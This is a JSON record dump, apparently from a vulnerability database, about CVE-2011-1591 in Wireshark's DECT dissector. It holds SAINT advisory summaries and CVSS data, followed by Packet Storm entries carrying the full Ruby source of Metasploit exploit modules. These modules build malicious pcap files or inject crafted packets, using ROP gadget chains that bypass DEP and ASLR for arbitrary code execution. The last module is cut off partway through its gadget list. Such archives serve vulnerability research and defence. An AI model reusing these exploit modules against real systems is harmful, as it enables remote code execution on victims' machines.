"SAINT:87BC0D6AC5A65F50E450B2FF0EBD2543", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/wireshark_dect_remote", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-07-29T16:40:23", "description": "Added: 10/11/2011 \nCVE: [CVE-2011-1591](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1591>) \nBID: [47392](<http://www.securityfocus.com/bid/47392>) \nOSVDB: [71848](<http://www.osvdb.org/71848>) \n\n\n### Background\n\n[Wireshark](<http://www.wireshark.org/>) is a network packet analyzer. \n\n### Problem\n\nA buffer overflow vulnerability in the DECT dissector (`epan/dissectors/packet-dect.c`) allows command execution via a specially crafted `**.pcap**` file. \n\n### Resolution\n\n[Upgrade](<http://www.wireshark.org/download.html>) to Wireshark 1.4.5 or higher. \n\n### References\n\n<http://www.wireshark.org/security/wnpa-sec-2011-06.html> \n\n\n### Limitations\n\nExploit works on Wireshark 1.4.4. \n\nThe user must open the exploit file in the affected application. \n\nThe \"Wireshark DECT Dissector Remote Stack Buffer Overflow\" remote exploit attempts to exploit the same vulnerability. The remote exploit has additional network and PERL module limitations, but does not require user cooperation. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2011-10-11T00:00:00", "type": "saint", "title": "Wireshark DECT Dissector PCAP File Processing Overflow", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1591"], "modified": "2011-10-11T00:00:00", "id": "SAINT:D42BF0A06302C4D52A87233BC36F2B8A", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/wireshark_dect", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-29T16:40:14", "description": "Added: 10/19/2011 \nCVE: [CVE-2011-1591](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1591>) \nBID: [47392](<http://www.securityfocus.com/bid/47392>) \nOSVDB: [71848](<http://www.osvdb.org/71848>) \n\n\n### Background\n\n[Wireshark](<http://www.wireshark.org/>) is a network packet analyzer. \n\n### Problem\n\nA buffer overflow vulnerability in the DECT dissector allows command execution when a user sends a specially crafted datagram over a network which is being analyzed by Wireshark. \n\n### Resolution\n\n[Upgrade](<http://www.wireshark.org/download.html>) to Wireshark 1.4.5 or higher. \n\n### References\n\n<http://www.wireshark.org/security/wnpa-sec-2011-06.html> \n\n\n### Limitations\n\nExploit works on Wireshark 1.4.4. \n\nThe affected target running Wireshark must be on the same network as as the SAINTexploit host. \n\nExploit requires the Net-Write PERL module to be installed on the scanning host. This module is available from <http://search.cpan.org/dist/Net-Write/lib/Net/Write.pm>. \n\nThe \"Wireshark DECT Dissector PCAP File Processing Overflow\" client exploit attempts to exploit the same vulnerability. The client exploit does not have the same network and PERL module limitations, but requires user cooperation. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2011-10-19T00:00:00", "type": "saint", "title": "Wireshark DECT Dissector Remote Stack Buffer Overflow", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1591"], "modified": "2011-10-19T00:00:00", "id": "SAINT:BDA51C29908C7EA6D082B06FCC37FF92", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/wireshark_dect_remote", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:33:37", "description": "Added: 10/11/2011 \nCVE: [CVE-2011-1591](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1591>) \nBID: [47392](<http://www.securityfocus.com/bid/47392>) \nOSVDB: [71848](<http://www.osvdb.org/71848>) \n\n\n### Background\n\n[Wireshark](<http://www.wireshark.org/>) is a network packet analyzer. \n\n### Problem\n\nA buffer overflow vulnerability in the DECT dissector (`epan/dissectors/packet-dect.c`) allows command execution via a specially crafted `**.pcap**` file. \n\n### Resolution\n\n[Upgrade](<http://www.wireshark.org/download.html>) to Wireshark 1.4.5 or higher. \n\n### References\n\n<http://www.wireshark.org/security/wnpa-sec-2011-06.html> \n\n\n### Limitations\n\nExploit works on Wireshark 1.4.4. \n\nThe user must open the exploit file in the affected application. \n\nThe \"Wireshark DECT Dissector Remote Stack Buffer Overflow\" remote exploit attempts to exploit the same vulnerability. The remote exploit has additional network and PERL module limitations, but does not require user cooperation. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2011-10-11T00:00:00", "type": "saint", "title": "Wireshark DECT Dissector PCAP File Processing Overflow", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1591"], "modified": "2011-10-11T00:00:00", "id": "SAINT:E68DD87E4FF5685E3D998F4BCDAA724F", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/wireshark_dect", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-26T11:35:48", "description": "Added: 10/11/2011 \nCVE: [CVE-2011-1591](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1591>) \nBID: [47392](<http://www.securityfocus.com/bid/47392>) \nOSVDB: [71848](<http://www.osvdb.org/71848>) \n\n\n### Background\n\n[Wireshark](<http://www.wireshark.org/>) is a network packet analyzer. \n\n### Problem\n\nA buffer overflow vulnerability in the DECT dissector (`epan/dissectors/packet-dect.c`) allows command execution via a specially crafted `**.pcap**` file. \n\n### Resolution\n\n[Upgrade](<http://www.wireshark.org/download.html>) to Wireshark 1.4.5 or higher. \n\n### References\n\n<http://www.wireshark.org/security/wnpa-sec-2011-06.html> \n\n\n### Limitations\n\nExploit works on Wireshark 1.4.4. \n\nThe user must open the exploit file in the affected application. \n\nThe \"Wireshark DECT Dissector Remote Stack Buffer Overflow\" remote exploit attempts to exploit the same vulnerability. The remote exploit has additional network and PERL module limitations, but does not require user cooperation. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2011-10-11T00:00:00", "type": "saint", "title": "Wireshark DECT Dissector PCAP File Processing Overflow", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1591"], "modified": "2011-10-11T00:00:00", "id": "SAINT:E36C6214A5DCBCA14BAC2168E800BE84", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/wireshark_dect", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-26T11:35:48", "description": "Added: 10/19/2011 \nCVE: [CVE-2011-1591](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1591>) \nBID: [47392](<http://www.securityfocus.com/bid/47392>) \nOSVDB: [71848](<http://www.osvdb.org/71848>) \n\n\n### Background\n\n[Wireshark](<http://www.wireshark.org/>) is a network packet analyzer. \n\n### Problem\n\nA buffer overflow vulnerability in the DECT dissector allows command execution when a user sends a specially crafted datagram over a network which is being analyzed by Wireshark. \n\n### Resolution\n\n[Upgrade](<http://www.wireshark.org/download.html>) to Wireshark 1.4.5 or higher. \n\n### References\n\n<http://www.wireshark.org/security/wnpa-sec-2011-06.html> \n\n\n### Limitations\n\nExploit works on Wireshark 1.4.4. \n\nThe affected target running Wireshark must be on the same network as as the SAINTexploit host. \n\nExploit requires the Net-Write PERL module to be installed on the scanning host. This module is available from <http://search.cpan.org/dist/Net-Write/lib/Net/Write.pm>. \n\nThe \"Wireshark DECT Dissector PCAP File Processing Overflow\" client exploit attempts to exploit the same vulnerability. The client exploit does not have the same network and PERL module limitations, but requires user cooperation. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2011-10-19T00:00:00", "type": "saint", "title": "Wireshark DECT Dissector Remote Stack Buffer Overflow", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1591"], "modified": "2011-10-19T00:00:00", "id": "SAINT:957CD90293FBA36DE518445A41B0E05B", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/wireshark_dect_remote", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:33:26", "description": "Added: 10/19/2011 \nCVE: [CVE-2011-1591](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1591>) \nBID: [47392](<http://www.securityfocus.com/bid/47392>) \nOSVDB: [71848](<http://www.osvdb.org/71848>) \n\n\n### Background\n\n[Wireshark](<http://www.wireshark.org/>) is a network packet analyzer. \n\n### Problem\n\nA buffer overflow vulnerability in the DECT dissector allows command execution when a user sends a specially crafted datagram over a network which is being analyzed by Wireshark. \n\n### Resolution\n\n[Upgrade](<http://www.wireshark.org/download.html>) to Wireshark 1.4.5 or higher. \n\n### References\n\n<http://www.wireshark.org/security/wnpa-sec-2011-06.html> \n\n\n### Limitations\n\nExploit works on Wireshark 1.4.4. \n\nThe affected target running Wireshark must be on the same network as as the SAINTexploit host. \n\nExploit requires the Net-Write PERL module to be installed on the scanning host. This module is available from <http://search.cpan.org/dist/Net-Write/lib/Net/Write.pm>. \n\nThe \"Wireshark DECT Dissector PCAP File Processing Overflow\" client exploit attempts to exploit the same vulnerability. The client exploit does not have the same network and PERL module limitations, but requires user cooperation. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2011-10-19T00:00:00", "type": "saint", "title": "Wireshark DECT Dissector Remote Stack Buffer Overflow", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1591"], "modified": "2011-10-19T00:00:00", "id": "SAINT:D7865E18B6BBAD4717C53FC6C4183F42", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/wireshark_dect_remote", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:21:45", "description": "", "cvss3": {}, "published": "2011-04-19T00:00:00", "type": "packetstorm", "title": "Wireshark 1.4.4 packet-dect.c Stack Buffer Overflow", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2011-1591"], "modified": "2011-04-19T00:00:00", "id": "PACKETSTORM:100563", "href": "https://packetstormsecurity.com/files/100563/Wireshark-1.4.4-packet-dect.c-Stack-Buffer-Overflow.html", "sourceData": "`## \n# $Id: wireshark_packet_dect.rb 12365 2011-04-19 11:32:17Z swtornio $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GoodRanking \n \ninclude Msf::Exploit::FILEFORMAT \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Wireshark <= 1.4.4 packet-dect.c Stack Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack buffer overflow in Wireshark <= 1.4.4 \nWhen opening a malicious .pcap file in Wireshark, a stack buffer occurs, \nresulting in arbitrary code execution. \nThis exploit bypasses DEP & ASLR and works on XP, Vista & Windows 7. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'sickness', #found the vulnerabilitiy \n'corelanc0d3r' #rop exploit + msf module \n], \n'Version' => '$Revision: 12365 $', \n'References' => \n[ \n[ 'CVE', '2011-1591'], \n[ 'OSVDB', '71848'], \n[ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5838' ], \n[ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5836' ], \n[ 'URL', 'http://www.exploit-db.com/exploits/17185' ], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'Space' => 936, \n'DisableNops' => 'True', \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ '32-bit Windows Universal (Generic DEP & ASLR Bypass)', \n{ \n'OffSet' => 1243, \n'Ret' => 0x667c484d, #libgnutl pivot - tx Lincoln \n} \n], \n], \n'Privileged' => false, \n'DisclosureDate' => 'Apr 18 2011', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('FILENAME', [ true, 'pcap file', 'passwords.pcap']), \n], self.class) \nend \n \ndef junk \nreturn rand_text(4).unpack(\"L\")[0].to_i \nend \n \ndef exploit \n \nprint_status(\"Creating '#{datastore['FILENAME']}' file ...\") \n \nglobal_header = \"\\xd4\\xc3\\xb2\\xa1\" # magic_number \nglobal_header << \"\\x02\\x00\" # major version \nglobal_header << \"\\x04\\x00\" # minor version \nglobal_header << \"\\x00\\x00\\x00\\x00\" # GMT to local correction \nglobal_header << \"\\x00\\x00\\x00\\x00\" # accuracy \nglobal_header << \"\\xff\\x7f\\x00\\x00\" # snaplen \nglobal_header << \"\\x01\\x00\\x00\\x00\" # data link type \n \npacket_header = \"\\x26\\x32\\xac\\x4d\" #timestamp seconds \npacket_header << \"\\xda\\xfa\\x00\\x08\" #timestamp microseconds \npacket_header << \"\\x04\\x06\\x00\\x00\" #nr of octets of packet in file \npacket_header << \"\\x04\\x06\\x00\\x00\" #actual size of packet (1540) \n \nptype = \"\\xff\\xff\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x00\\x00\\x00\\x23\\x23\" \n \nprint_status(\"Preparing payload\") \n \npivot = [target.ret].pack('V') \n \n# pvefindaddr rop 'n roll \n# tx dadr00p (https://twitter.com/dietersar) for testing the offsets below \nrop_pivot = \n[ \n0x618d7d0e, # RET \n0x618d7d0e, # RET \n0x618d7d0e, # RET \n0x64f9d5ec, # ADD ESP,0C # RET - libfontconfig-1.dll \n0x618d7d0e, # RET <- don't count on this one ! \n0x618d7d0e, # RET \n0x618d7d0e, # RET \n0x618d7d0e, # RET \n0x61C14268, # ADD ESP,24 # RETN - freetype6.dll \n0xFFFFFFFF, # crash baby ! \n0xFFFFFFFF, \n0xFFFFFFFF, \n0xFFFFFFFF, \n0xFFFFFFFF, \n0x618d7d0e, \n0x618d7d0e, \n0x618d7d0e, \n0x618d7d0e, \n].pack(\"V*\") \n \nrop_gadgets = \n[ \n \n0x6d7155cb, # PUSH ESP # POP EBX # POP EBP # RETN **[libpangoft2-1.0-0.dll] \njunk, \n0x6d596e31, # MOV EAX,EBX # POP EBX # POP EBP # RETN **[libgio-2.0-0.dll] \njunk, \njunk, \n0x61c14552, # POP EBX # RETN ** [freetype6.dll] \n0x00000800, # size - 0x800 should be more than enough \n0x61c14043, # POP ESI # RETN ** [freetype6.dll] \n0x0000009C, \n0x6d58321a, # ADD EAX,ESI # POP ESI # POP EBP # RETN **[libgio-2.0-0.dll] \njunk, \njunk, \n0x68610a27, # XCHG EAX,EBP # RETN ** [libglib-2.0-0.dll] \n0x629445a6, # POP EAX # RETN ** [libatk-1.0-0.dll] \n0x62d9027c, # \n0x6c385913, # MOV EAX,DWORD PTR DS:[EAX] # ADD CL,CL # RETN ** [libgdk-win32-2.0-0.dll] \n0x617bc526, # XCHG EAX,ESI # ADD AL,10 # ADD CL,CL # RETN ** [libgtk-win32-2.0-0.dll] \n0x64f8c692, # POP EDX # RETN ** [libfontconfig-1.dll] \n0x00000040, # \n0x619638db, # POP ECX # RETN ** [libgtk-win32-2.0-0.dll] \n0x6536B010, # RW \n0x618d7d0d, # POP EDI # RETN ** [libgtk-win32-2.0-0.dll] \n0x618d7d0e, # RET \n0x64fa0c15, # POP EAX # RETN ** [libfontconfig-1.dll] \n0x618d7d0e, # RET \n0x61963fdb, # PUSHAD # RETN ** [libgtk-win32-2.0-0.dll] \n].pack(\"V*\") \n \npivot = [target.ret].pack('V') \n \nbuffer = rand_text(131) \nbuffer << rop_pivot \nbuffer << rop_gadgets \n \nnops = make_nops(target['OffSet'] - (buffer.length) - (payload.encoded.length)) \n \nbuffer << nops \nbuffer << payload.encoded \nbuffer << pivot \n \nfiller = 1540 - buffer.length \n \nbuffer << rand_text(filler) \n \nfilecontent = global_header \nfilecontent << packet_header \nfilecontent << ptype \nfilecontent << buffer \n \nprint_status(\"Writing payload to file, \" + filecontent.length.to_s()+\" bytes\") \n \nfile_create(filecontent) \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/100563/wireshark_packet_dect.rb.txt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:20:05", "description": "", "cvss3": {}, "published": "2012-02-02T00:00:00", "type": "packetstorm", "title": "Wireshark 1.4.4 Remote Stack Buffer Overflow", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2011-1591"], "modified": "2012-02-02T00:00:00", "id": "PACKETSTORM:109342", "href": "https://packetstormsecurity.com/files/109342/Wireshark-1.4.4-Remote-Stack-Buffer-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GoodRanking \n \ninclude Msf::Exploit::Remote::Capture \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Wireshark <= 1.4.4 packet-dect.c Stack Buffer Overflow (remote)', \n'Description' => %q{ \nThis module exploits a stack buffer overflow in Wireshark <= 1.4.4 \nby sending an malicious packet.) \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Paul Makowski', #Initial discovery \n'sickness', #proof of concept \n'corelanc0d3r <peter.ve[at]corelan.be>', #rop exploit + msf module \n], \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2011-1591'], \n[ 'OSVDB', '71848'], \n[ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5838' ], \n[ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5836' ], \n[ 'URL', 'http://www.exploit-db.com/exploits/17185' ], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'Space' => 936, \n'DisableNops' => 'True', \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Win32 Universal (Generic DEP & ASLR Bypass)', \n{ \n'OffSet' => 1243, \n'Ret' => 0x667c484d, #libgnutl pivot - tx Lincoln \n} \n], \n], \n'Privileged' => false, \n'DisclosureDate' => 'Apr 18 2011', \n'DefaultTarget' => 0)) \n \nregister_options([ \nOptBool.new('LOOP', [true, 'Send the packet every X seconds until the job is killed', false]), \nOptInt.new('DELAY', [true, 'This option sets the delay between sent packets', 5]) \n], self.class) \n \nregister_advanced_options([ \nOptBool.new(\"ExitOnSession\", [ false, \"Return from the exploit after a session has been created\", true ]), \n \n], self.class) \n \nderegister_options('FILTER','PCAPFILE','RHOST','SNAPLEN','TIMEOUT','UDP_SECRET','NETMASK','GATEWAY') \nend \n \ndef junk \nreturn rand_text(4).unpack(\"L\")[0].to_i \nend \n \ndef exploit \ncheck_pcaprub_loaded # Check first \n \nptype = \"\\xff\\xff\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x00\\x00\\x00\\x23\\x23\" \n \nprint_status(\"Preparing payload\") \n \npivot = [target.ret].pack('V') \n \n# pvefindaddr rop 'n roll \n# tx dadr00p (https://twitter.com/dietersar) for testing the offsets below \nrop_pivot = \n[ \n0x618d7d0e, # RET \n0x618d7d0e, # RET \n0x618d7d0e, # RET \n0x64f9d5ec, # ADD ESP,0C # RET - libfontconfig-1.dll \n0x618d7d0e, # RET <- don't count on this one ! \n0x618d7d0e, # RET \n0x618d7d0e, # RET \n0x618d7d0e, # RET \n0x61C14268, # ADD ESP,24 # RETN - freetype6.dll \n0xFFFFFFFF, # crash baby ! \n0xFFFFFFFF, \n0xFFFFFFFF, \n0xFFFFFFFF, \n0xFFFFFFFF, \n0x618d7d0e, \n0x618d7d0e, \n0x618d7d0e, \n0x618d7d0e, \n].pack(\"V*\") \n \nrop_gadgets = \n[ \n0x6d7155cb, # PUSH ESP # POP EBX # POP EBP # RETN **[libpangoft2-1.0-0.dll] \njunk, \n0x6d596e31, # MOV EAX,EBX # POP EBX # POP EBP # RETN **[libgio-2.0-0.dll] \njunk, \njunk, \n0x61c14552, # POP EBX # RETN ** [freetype6.dll] \n0x00000800, # size - 0x800 should be more than enough \n0x61c14043, # POP ESI # RETN ** [freetype6.dll] \n0x0000009C, \n0x6d58321a, # ADD EAX,ESI # POP ESI # POP EBP # RETN **[libgio-2.0-0.dll] \njunk, \njunk, \n0x68610a27, # XCHG EAX,EBP # RETN ** [libglib-2.0-0.dll] \n0x629445a6, # POP EAX # RETN ** [libatk-1.0-0.dll] \n0x62d9027c, # \n0x6c385913, # MOV EAX,DWORD PTR DS:[EAX] # ADD CL,CL # RETN ** [libgdk-win32-2.0-0.dll] \n0x617bc526, # XCHG EAX,ESI # ADD AL,10 # ADD CL,CL # RETN ** [libgtk-win32-2.0-0.dll] \n0x64f8c692, # POP EDX # RETN ** [libfontconfig-1.dll] \n0x00000040, # \n0x619638db, # POP ECX # RETN ** [libgtk-win32-2.0-0.dll] \n0x6536B010, # RW \n0x618d7d0d, # POP EDI # RETN ** [libgtk-win32-2.0-0.dll] \n0x618d7d0e, # RET \n0x64fa0c15, # POP EAX # RETN ** [libfontconfig-1.dll] \n0x618d7d0e, # RET \n0x61963fdb, # PUSHAD # RETN ** [libgtk-win32-2.0-0.dll] \n].pack(\"V*\") \n \npivot = [target.ret].pack('V') \n \nbuffer = rand_text(131) \nbuffer << rop_pivot \nbuffer << rop_gadgets \n \nnops = make_nops(target['OffSet'] - (buffer.length) - (payload.encoded.length)) \n \nbuffer << nops \nbuffer << payload.encoded \nbuffer << pivot \n \nfiller = 1500 - buffer.length \n \nbuffer << rand_text(filler) \n \npkt = ptype \npkt << buffer \n \nprint_status(\"Sending malicious packet\") \nopen_pcap() \n \n#handler \nif datastore['LOOP'] \nwhile true \nbreak if session_created? and datastore['ExitOnSession'] \ninject(pkt) \nselect(nil,nil,nil,datastore['DELAY']) \nend \nelse \ninject(pkt) \nend \n \nclose_pcap \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/109342/windows-misc-wireshark_packet_dect.rb.txt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:23:41", "description": "", "cvss3": {}, "published": "2012-02-02T00:00:00", "type": "packetstorm", "title": "Wireshark 1.4.4 Local Stack Buffer Overflow", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2011-1591"], "modified": "2012-02-02T00:00:00", "id": "PACKETSTORM:109341", "href": "https://packetstormsecurity.com/files/109341/Wireshark-1.4.4-Local-Stack-Buffer-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GoodRanking \n \ninclude Msf::Exploit::FILEFORMAT \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Wireshark <= 1.4.4 packet-dect.c Stack Buffer Overflow (local)', \n'Description' => %q{ \nThis module exploits a stack buffer overflow in Wireshark <= 1.4.4 \nWhen opening a malicious .pcap file in Wireshark, a stack buffer occurs, \nresulting in arbitrary code execution. \n \nNote: To exploit the vulnerability remotely with Scapy: sendp(rdpcap(\"file\")) \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Paul Makowski', #Initial discovery \n'sickness', #proof of concept \n'corelanc0d3r <peter.ve[at]corelan.be>', #rop exploit + msf module \n], \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2011-1591'], \n[ 'OSVDB', '71848'], \n[ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5838' ], \n[ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5836' ], \n[ 'URL', 'http://www.exploit-db.com/exploits/17185' ], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'Space' => 936, \n'DisableNops' => 'True', \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Win32 Universal (Generic DEP & ASLR Bypass)', \n{ \n'OffSet' => 1243, \n'Ret' => 0x667c484d, #libgnutl pivot - tx Lincoln \n} \n], \n], \n'Privileged' => false, \n'DisclosureDate' => 'Apr 18 2011', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('FILENAME', [ true, 'pcap file', 'passwords.pcap']), \n], self.class) \nend \n \ndef junk \nreturn rand_text(4).unpack(\"L\")[0].to_i \nend \n \ndef exploit \n \nprint_status(\"Creating '#{datastore['FILENAME']}' file ...\") \n \nglobal_header = \"\\xd4\\xc3\\xb2\\xa1\" # magic_number \nglobal_header << \"\\x02\\x00\" # major version \nglobal_header << \"\\x04\\x00\" # minor version \nglobal_header << \"\\x00\\x00\\x00\\x00\" # GMT to local correction \nglobal_header << \"\\x00\\x00\\x00\\x00\" # accuracy \nglobal_header << \"\\xff\\x7f\\x00\\x00\" # snaplen \nglobal_header << \"\\x01\\x00\\x00\\x00\" # data link type \n \npacket_header = \"\\x26\\x32\\xac\\x4d\" #timestamp seconds \npacket_header << \"\\xda\\xfa\\x00\\x08\" #timestamp microseconds \npacket_header << \"\\xdc\\x05\\x00\\x00\" #nr of octets of packet in file \npacket_header << \"\\xdc\\x05\\x00\\x00\" #actual size of packet (1500) \n \nptype = \"\\xff\\xff\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x00\\x00\\x00\\x23\\x23\" \n \nprint_status(\"Preparing payload\") \n \npivot = [target.ret].pack('V') \n \n# pvefindaddr rop 'n roll \n# tx dadr00p (https://twitter.com/dietersar) for testing the offsets below \nrop_pivot = \n[ \n0x618d7d0e, # RET \n0x618d7d0e, # RET \n0x618d7d0e, # RET \n0x64f9d5ec, # ADD ESP,0C # RET - libfontconfig-1.dll \n0x618d7d0e, # RET <- don't count on this one ! \n0x618d7d0e, # RET \n0x618d7d0e, # RET \n0x618d7d0e, # RET \n0x61C14268, # ADD ESP,24 # RETN - freetype6.dll \n0xFFFFFFFF, # crash baby ! \n0xFFFFFFFF, \n0xFFFFFFFF, \n0xFFFFFFFF, \n0xFFFFFFFF, \n0x618d7d0e, \n0x618d7d0e, \n0x618d7d0e, \n0x618d7d0e, \n].pack(\"V*\") \n \nrop_gadgets = \n[ \n \n0x6d7155cb, # PUSH ESP # POP EBX # POP EBP # RETN **[libpangoft2-1.0-0.dll] \njunk, \n0x6d596e31, # 